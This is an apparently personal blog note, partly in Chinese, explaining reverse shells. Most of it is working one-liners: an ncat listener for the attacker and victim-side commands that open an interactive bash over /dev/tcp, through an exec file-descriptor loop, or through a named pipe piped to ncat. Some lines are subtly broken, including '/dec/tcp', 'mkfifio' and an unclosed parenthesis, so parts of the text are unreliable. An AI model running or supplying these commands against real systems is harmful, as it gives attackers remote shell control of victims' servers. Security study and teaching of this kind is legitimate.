reverse shell

 

 

反弹shell(reverse shell),就是攻击端(本机)监听在某TCP/UDP端口,受害端(目标服务器)发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。

ncat:

attacker

ncat --listen --source-port 5555 --keep-open

victim

ncat --exec /bin/bash IP 5555 
bash -i >& /dev/tcp/intrinsic/5555 0<&1

This snippet runs a new interactive instance of bash (bash -i), on a TCP connection to the specified port on the specified host which is created for the duration of the bash process. Standard output and standard error are sent through this connection

(>& /dec/tcp/HOST/PORT), and standard input is read through this connection (0>&1) this should be 0<&1, but 0>&1 works too

echo b c > /dev/tcp/HOST/PORT
exec 5<> /dev/tcp/HOST/PORT

cat <&5 | while read line; do
    $line >&5 2>&1
done

 

file=$(mktemp --dry-run -p /tmp --suffix .pipe tmp.XXX

mkfifio --mode=700 $file

cat $file | bash -i 2>&1 | ncat HOST PORT > $file

cat output pipe content to bash, bash execute, nc pipe the output to pipe 

 

posted @   ascertain  阅读(70)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· DeepSeek “源神”启动!「GitHub 热点速览」
· 微软正式发布.NET 10 Preview 1:开启下一代开发框架新篇章
· C# 集成 DeepSeek 模型实现 AI 私有化(本地部署与 API 调用教程)
· DeepSeek R1 简明指南:架构、训练、本地部署及硬件要求
· 2 本地部署DeepSeek模型构建本地知识库+联网搜索详细步骤
历史上的今天:
2022-02-02 CSS: transform transition
点击右上角即可分享
微信分享提示